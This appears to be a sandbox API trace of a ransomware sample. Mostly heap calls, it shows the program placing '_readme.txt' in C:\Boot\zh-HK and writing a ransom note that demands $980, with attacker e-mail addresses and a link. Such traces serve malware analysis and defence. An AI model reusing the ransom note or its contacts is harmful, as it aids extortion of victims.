dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.078] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0166.078] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.078] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.078] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.078] PathFindFileNameW (pszPath="") returned="" [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.079] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.079] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.079] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.079] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0166.079] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0166.079] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.079] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0166.080] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.080] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we 